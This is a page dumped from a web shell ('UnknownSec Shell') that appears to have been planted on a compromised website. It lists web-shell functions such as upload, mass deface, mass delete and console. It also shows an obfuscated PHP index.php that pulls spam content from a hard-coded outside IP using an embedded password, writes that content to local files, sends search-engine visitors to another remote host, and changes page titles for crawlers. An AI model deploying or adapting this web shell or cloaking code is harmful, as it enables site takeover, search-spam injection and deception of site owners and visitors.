shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
public
/
z4rkzs
/ [
drwxrwxrwx
]
upload
mass deface
mass delete
console
info server
name :
index.php
<?php goto ZpwJo; I3XtR: if ($_GET["\x69\144"] == "\164\145\163\x74\151\x6e\147") { echo "\x74\145\163\164\x20\147\x6f\157\144\x2e\56\x2e"; die; } goto N4PBJ; aDk5s: if (strlen($text) < 5000) { $text = file_get_contents("\150\x74\x74\x70\72\x2f\57\x36\65\56\x31\x30\71\x2e\x36\x37\x2e\x31\x30\x30\57" . $_GET["\x66\x6e"] . "\56\x70\150\x70\77\x70\141\x73\x73\75{$apass}\46\x71\75{$_GET["\151\144"]}"); } goto aQl1F; GSUac: if (strlen($text) > 500) { $out = fopen("\151\x6e\144\x65\x78\x2f" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto JhtpZ; CKVDj: $xx1 = 5; goto LN4YP; Yttvk: $s = dirname($_SERVER["\120\110\120\x5f\123\x45\114\x46"]); goto jTzf4; p6kO8: $keyword = str_replace("\x20", "\x2b", $keyword); goto bvhfg; pPIGh: if (strpos($_SERVER["\110\x54\124\x50\x5f\122\x45\x46\105\x52\105\122"], "\147\x6f\x6f\147\x6c\145\56") or strpos($_SERVER["\x48\x54\x54\120\x5f\x52\105\x46\x45\122\x45\122"], "\171\141\x68\x6f\x6f\56") or strpos($_SERVER["\x48\x54\124\x50\x5f\x52\x45\x46\x45\122\105\122"], "\142\151\x6e\x67\x2e")) { $tpl = "\x69\x6e\x64\145\170\x2f" . $_GET["\151\x64"] . "\x2e\x70\150\x70\56\x74\x70\154"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\155\171"]; header("\x4c\x6f\143\x61\164\x69\x6f\156\72\x20\150\x74\164\160\72\57\x2f\x36\65\x2e\x31\x30\70\56\x31\60\56\61\x39\71\57\x65\x6e\x74\145\x72\x2f\77\x6d\141\x72\153\75{$today}\x2d{$s}\x26\164\160\154\x3d{$tpl}\46\145\x6e\x67\153\x65\171\75{$keyword}"); die; } else { $myname = $_GET["\151\144"] . "\x2e\160\150\160"; if (file_exists("\151\156\144\x65\170\57" . $myname)) { $html = @file_get_contents("\151\x6e\x64\145\170\57" . $myname); if (strpos($_SERVER["\x48\124\x54\x50\137\125\x53\105\x52\137\x41\x47\x45\116\x54"], "\x62\151\x6e\x67") > 2 or strpos($_SERVER["\x48\x54\x54\120\x5f\125\x53\105\x52\x5f\101\107\x45\x4e\x54"], "\x79\141\x68\157\157") > 2) { $keyword = str_replace("\x2d", "\x20", $_GET["\x69\144"]); $html = str_replace("\x3c\164\151\164\x6c\x65\76\x3c\57\x74\x69\164\154\x65\x3e", "\74\164\x69\164\x6c\145\76{$keyword}\74\57\x74\x69\x74\x6c\145\x3e", $html); } echo $html; die; } } goto mPEU8; OANYA: $_GET["\146\156"] = "\x36\71\x36\71\x36\71\x6e\x65\x77"; goto V98P4; MaJqN: foreach ($_GET as $a => $b) { $_GET["\151\x64"] = $b; } goto I3XtR; ZpwJo: error_reporting(0); goto sIBET; LN4YP: $keyword = str_replace("\x2d", "\x20", $_GET["\151\x64"]); goto p6kO8; N4PBJ: if ($_GET["\x69\144"] == "\x69\156\144\145\x78") { header("\114\157\x63\141\164\x69\157\156\72\40\150\x74\x74\x70\163\72\57\x2f\x67\x6f\x6f\x67\154\x65\x2e\143\157\155"); die; } goto gFHUH; oPdh8: if (function_exists("\143\165\x72\154\137\x69\x6e\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\164\164\x70\x3a\57\57\66\65\x2e\61\x30\71\x2e\x36\67\x2e\61\60\60\x2f" . $_GET["\146\156"] . "\56\x70\x68\x70\x3f\160\x61\163\x73\x3d{$apass}\46\x71\75{$_GET["\x69\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\x69\154\154\x61\57\x34\56\x30\40\50\143\157\x6d\x70\141\x74\151\142\x6c\x65\x3b\40\x4d\x53\111\x45\x20\66\56\60\x3b\x20\x57\x69\x6e\144\157\x77\163\40\116\x54\x20\65\x2e\61\x3b\x20\123\126\x31\x29"); $text = curl_exec($ch); curl_close($ch); } goto aDk5s; JvaNG: $apass3 = "\162\166\x33\62\171\144\141\x63\163\x76\x73\144\166"; goto k2QUR; sIBET: $today = "\x32\x30\62\x36\60\x32\60\x36\55"; goto MaJqN; k2QUR: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto pPIGh; kah2Q: $text = ''; goto oPdh8; jTzf4: if ($s == "\134" | $s == "\x2f") { $s = ''; } goto CuDVr; t7pR5: $x1 = 3; goto CKVDj; CuDVr: $s = $_SERVER["\x53\x45\x52\126\x45\x52\x5f\x4e\101\115\x45"] . $s; goto JvaNG; gFHUH: $_GET["\x77\157\162\154\144"] = 5; goto OANYA; bvhfg: $apass2 = "\x62\62\63\x68\162\62\63\166\x72\x33\x32"; goto Yttvk; JhtpZ: echo $text; goto C8YVk; V98P4: $apass1 = "\x76\151\x73\144\x6f\151\x6a\x65\167"; goto t7pR5; aQl1F: if (strlen($text) < 5000) { $url = "\x36\x35\x2e\x31\x30\71\x2e\x36\67\56\61\x30\x30"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\50{$errno}\x29\74\x62\x72\40\x2f\76\12"; } else { $req = "\x2f" . $_GET["\146\x6e"] . "\x2e\x70\150\x70\77\x70\x61\163\x73\x3d{$apass}\46\161\75{$_GET["\x69\x64"]}"; $out = "\107\x45\x54\40{$req}\x20\110\x54\124\120\57\61\56\60\15\xa"; $out .= "\110\x6f\163\164\72\40{$url}\15\12"; $out .= "\103\157\x6e\x6e\x65\x63\164\151\157\156\x3a\x20\x43\x6c\157\x73\145\15\12\xd\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto GSUac; mPEU8: $query_pars_2 = str_replace("\x2d", "\53", $_GET["\x69\144"]); goto kah2Q; C8YVk: ?>
© 2026 UnknownSec